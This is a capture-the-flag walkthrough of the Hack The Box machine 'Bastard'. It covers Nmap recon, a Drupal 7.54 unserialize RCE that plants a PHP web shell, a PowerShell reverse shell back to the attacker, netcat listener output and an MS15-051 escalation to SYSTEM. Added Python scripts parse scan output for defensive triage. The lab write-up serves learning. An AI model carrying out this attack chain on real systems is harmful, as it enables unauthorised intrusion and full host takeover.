Bastard HTB — WalkThrough

Max Register
Aug 24, 2020

This walkthrough covers the Windows box Bastard, focusing on post-exploitation privilege escalation.

Initial Scans

Let’s kick it off with our go-to Nmap scan, using -sC for default scripts, -sV to enumerate service versions and -oA to write the output in all three formats.

# Nmap 7.80 scan initiated Sun Aug 16 20:40:16 2020 as: nmap -sC -sV -oA initial 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 16 20:41:23 2020 -- 1 IP address (1 host up) scanned in 67.34 seconds

Here we see that we have a Microsoft IIS httpd server listening on port 80 and MSRPC listening on both port 135 and 49154. Because web servers generally have a larger attack surface, let’s take a look at that first. In the scan, we see there is Drupal 7.X running and Nmap lets us know to check out CHANGELOG.txt as well as other interesting files.

Opening the server in the browser, we are presented with a Drupal login page:

The CHANGELOG.txt file that Nmap brought to our attention gives us plenty of information on the version of Drupal running:

Finding Exploits

From here we have an exact version, 7.54, and can start looking for exploits for this particular version.
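As an added example (not code from the original writeup), the following Python extracts by script what the text above reads by eye: the open ports and their NSE script results from the Nmap output, which version-disclosing files robots.txt points at, and the exact Drupal release from the top of CHANGELOG.txt. Both inputs are constructed samples, trimmed from the scan above and from the Drupal 7 CHANGELOG.txt header format ("Drupal <version>, <date>"). The same check, run against your own Drupal site, confirms whether CHANGELOG.txt and the INSTALL/UPGRADE text files are removed or blocked, since those files are what turn "Drupal 7" into an exact version.

```python
import re

# Constructed sample: the Nmap normal-output lines from the scan above, abridged.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
|_/themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
"""

# Constructed sample: the first lines of a Drupal 7 CHANGELOG.txt. The newest
# release entry comes first, in the form "Drupal <version>, <YYYY-MM-DD>".
CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition).
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w.-]+):\s*(.*)$")
DRUPAL_RE = re.compile(r"^Drupal (\d+\.\d+(?:\.\d+)?), (\d{4}-\d{2}-\d{2})")


def parse_nmap(text):
    """Return one dict per port line; NSE script output is attached to the port it follows."""
    ports, last_key = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip(), "scripts": {}})
            last_key = None
            continue
        if not line.startswith("|") or not ports:
            continue
        m = SCRIPT_RE.match(line)
        if m:
            last_key = m.group(1)
            ports[-1]["scripts"][last_key] = m.group(2)
        elif last_key:
            # continuation line of a multi-line script result (e.g. the robots.txt paths)
            ports[-1]["scripts"][last_key] += " " + line.lstrip("|_ ").strip()
    return ports


def web_fingerprint(ports):
    """CMS hint plus the .txt/.php files robots.txt advertises, for the first http service."""
    for p in ports:
        if p["service"] != "http":
            continue
        robots = p["scripts"].get("http-robots.txt", "")
        disclosed = sorted(f for f in robots.split() if f.lower().endswith((".txt", ".php")))
        return {"port": p["port"],
                "generator": p["scripts"].get("http-generator", ""),
                "disclosure_files": disclosed}
    return None


def drupal_version(changelog_text):
    """(version, release_date) from the first release header of CHANGELOG.txt, or None."""
    for line in changelog_text.splitlines():
        m = DRUPAL_RE.match(line)
        if m:
            return m.group(1), m.group(2)
    return None


if __name__ == "__main__":
    fp = web_fingerprint(parse_nmap(NMAP_OUTPUT))
    print(fp)
    print(drupal_version(CHANGELOG))
```

The robots.txt entries are worth a second look from the defensive side: Drupal's default robots.txt disallows these files to keep them out of search engines, but in doing so it hands anyone reading it a list of exactly which version-bearing files exist.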

Ambionics

The first search result for ‘Drupal 7.54 Exploits’ brings us to the Ambionics page for Drupal 7.X Services Module Unserialize() Remote Code Execution.

Searching that page for our version, ‘7.54’, shows that this exploit has been run against our specific version.

I would recommend reading the article to get a better understanding of how this exploit works. As explained in the screenshot above, the Services module lets the site owner create different endpoints with different resources, so we do not know what path the creator chose for the REST endpoint. We can find it with a directory scan or by guessing likely paths in the browser. Guessing turned out to be the easiest way, as the endpoint was simply /rest/.

This endpoint will be important to know when we go to edit the exploit. We can find the exploit in searchsploit by searching for drupal.

This title is similar to the blog post by Ambionics that we looked at earlier. Copying the exploit to our working directory, and opening it with a text editor, we see that the same blog post is linked in the comments.

Modifying The Exploit

We need to modify the $url and $endpoint_path variables to our target IP and REST endpoint, respectively. We also modify $file so that the written PHP file uses shell_exec, which runs the supplied command through a shell and returns its output as a string. Adding an upload function to our web shell is a good idea, because we may need to send tools to the victim machine.

I couldn’t get the formatting to stay correct in the code box, sorry :)

Now that this is all set up we can run the exploit against our target.

The exploit was successful and our file was written to the host. Let’s now go to that URL and attempt to execute a command.

Great! We now have remote code execution through the browser. Running systeminfo will tell us a little more about the machine.

Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 23/8/2020, 7:02:03
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.604 MB
Virtual Memory: In Use: 491 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9

We see that we are running Microsoft Windows Server 2008 R2 x64 with no apparent hotfixes.

It would be helpful to get a reverse shell connecting back to us, and there are a few ways of doing that. We could find a 64-bit Windows build of Netcat, upload it to the host and connect back that way, or we could use a PowerShell script that opens a reverse PowerShell session back to our machine.

Since we are going to be running a few Windows privilege escalation scripts that use PowerShell, let’s use the Invoke-PowerShellTcp.ps1 script for our reverse shell. This script comes with PowerShell Empire and can be found using the locate command. Once the script is found, copy it to our working directory and open it in a text editor.

In the example, we need to copy the highlighted command to the last line of the file. In vi, highlight the text, press y to yank it, SHIFT+G to jump to the last line, then p to paste it after the cursor. Change the IP address and port to our own.

Save and quit with :wq and host the directory using Python’s SimpleHTTPServer with the following command:

python -m SimpleHTTPServer

Now we can use our web shell to invoke the PowerShell script and send us back a reverse shell.

Enumeration Through the User Shell

Now that we have a shell that is easier to work with, we can start privilege escalation enumeration using some PowerShell scripts. I like to start with the Sherlock.ps1 script.

Once the script is located and copied to our working directory, we edit it so that Find-AllVulns runs automatically, by appending that command at the end of the script.

Save and quit with :wq and, once again, host the directory with a Python SimpleHTTPServer.

Now we can execute the script with the same PowerShell one-liner that we used for the Invoke-PowerShellTcp.ps1 script.

We find two possible vulnerabilities in this scan.

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

I could not find a version of the MS10-092 exploit that did not use Metasploit, so we are going to use the MS15-051 exploit, which can be found with a simple Google search.
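The systeminfo output earlier and the Sherlock findings above are the two facts a defender would want out of this host: a Server 2008 R2 build with no hotfixes at all, and two kernel bulletins that Sherlock reports as unpatched. As an added example (not code from the original writeup or from Sherlock), this Python parses both outputs into structured records and produces a triage summary. The inputs are constructed samples: a trimmed copy of the systeminfo above, a second systeminfo for a hypothetical patched host whose KB numbers are placeholders, and the Sherlock findings above plus a placeholder record with a different status, included to show that only "Appears Vulnerable" entries are reported.

```python
import re

# Constructed sample: a trimmed copy of the systeminfo output above.
SYSTEMINFO = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 [01]: 10.10.10.9
"""

# Constructed sample of a patched host; the KB ids are placeholders, not real updates.
SYSTEMINFO_PATCHED = """\
Host Name:                 OTHERHOST
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
"""

# Constructed sample: the two Sherlock findings above plus a placeholder record.
SHERLOCK = """\
Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Placeholder check (not a real bulletin)
MSBulletin : MS00-000
CVEID      : 0000-0000
VulnStatus : Not Vulnerable
"""

KV_RE = re.compile(r"^([A-Za-z][^:]*?):\s*(.*)$")   # "Key: value" at column 0
ITEM_RE = re.compile(r"^\s+\[(\d+)\]:\s*(.*)$")      # indented "[01]: item" lines


def parse_systeminfo(text):
    """Map top-level keys to values; indented [nn] items are stored under '<key>_items'."""
    info, key = {}, None
    for line in text.splitlines():
        m = ITEM_RE.match(line)
        if m and key:
            info.setdefault(key + "_items", []).append(m.group(2).strip())
            continue
        m = KV_RE.match(line)
        if m and not line.startswith(" "):   # indented sub-keys (Connection Name) are skipped
            key = m.group(1).strip()
            info[key] = m.group(2).strip()
    return info


def hotfixes(info):
    """Installed KB ids; empty when systeminfo reports N/A, i.e. no updates at all."""
    if info.get("Hotfix(s)", "N/A").startswith("N/A"):
        return []
    return [h for h in info.get("Hotfix(s)_items", []) if h.startswith("KB")]


def os_build(info):
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    return int(m.group(1)) if m else None


def parse_sherlock(text):
    """Split Sherlock's Format-List style output into one dict per finding."""
    findings, cur = [], {}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        if not sep:
            continue
        key, val = key.strip(), val.strip()
        if key == "Title" and cur:       # a new Title line starts the next record
            findings.append(cur)
            cur = {}
        cur[key] = val
    if cur:
        findings.append(cur)
    return findings


def triage(systeminfo_text, sherlock_text):
    """Summarise patch state and which Sherlock checks came back positive."""
    info = parse_systeminfo(systeminfo_text)
    hits = [f for f in parse_sherlock(sherlock_text) if f.get("VulnStatus") == "Appears Vulnerable"]
    return {"host": info.get("Host Name"),
            "build": os_build(info),
            "hotfixes": hotfixes(info),
            "unpatched_bulletins": [f["MSBulletin"] for f in hits],
            "cves": sorted(c.strip() for f in hits for c in f["CVEID"].split(","))}


if __name__ == "__main__":
    print(triage(SYSTEMINFO, SHERLOCK))
```

An empty hotfix list on a build 7600 host is the headline finding here; Sherlock's per-bulletin checks only confirm what the missing Service Pack already implies.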

GitHub

We can choose the zip file and download it. All we need is the 64-bit version, so copy that to the working directory and host it with the Python SimpleHTTPServer.

Now we can use the fupload function we added to our web shell to upload the exploit to the host. Then, using nc64.exe, we get a remote shell, run the exploit and obtain SYSTEM privileges.

kali@kali:~$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.9] 49186
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\inetpub\drupal-7.54
24/08/2020 02:31 <DIR> .
24/08/2020 02:31 <DIR> ..
19/03/2017 01:42 317 .editorconfig
19/03/2017 01:42 174 .gitignore
19/03/2017 01:42 5.969 .htaccess
19/03/2017 01:42 6.604 authorize.php
19/03/2017 01:42 110.781 CHANGELOG.txt
19/03/2017 01:42 1.481 COPYRIGHT.txt
19/03/2017 01:42 720 cron.php
19/03/2017 01:43 <DIR> includes
19/03/2017 01:42 529 index.php
19/03/2017 01:42 1.717 INSTALL.mysql.txt
19/03/2017 01:42 1.874 INSTALL.pgsql.txt
19/03/2017 01:42 703 install.php
19/03/2017 01:42 1.298 INSTALL.sqlite.txt
19/03/2017 01:42 17.995 INSTALL.txt
19/03/2017 01:42 18.092 LICENSE.txt
19/03/2017 01:42 8.710 MAINTAINERS.txt
19/03/2017 01:43 <DIR> misc
19/03/2017 01:43 <DIR> modules
24/08/2020 02:31 55.296 ms15-051x64.exe
24/08/2020 01:16 43.696 nc64.exe
19/03/2017 01:43 <DIR> profiles
19/03/2017 01:42 5.382 README.txt
19/03/2017 01:42 2.189 robots.txt
24/08/2020 01:26 272 s4u.php
19/03/2017 01:43 <DIR> scripts
24/08/2020 01:04 266 shell.php
19/03/2017 01:43 <DIR> sites
19/03/2017 01:43 <DIR> themes
19/03/2017 01:42 19.986 update.php
19/03/2017 01:42 10.123 UPGRADE.txt
19/03/2017 01:42 2.200 web.config
19/03/2017 01:42 417 xmlrpc.php
25 File(s) 316.791 bytes
9 Dir(s) 30.807.846.912 bytes free
C:\inetpub\drupal-7.54>ms15-051x64.exe whoami
ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 868 created.
==============================
nt authority\system
C:\inetpub\drupal-7.54>

We have system privileges! Thank you for your time in reading this writeup.
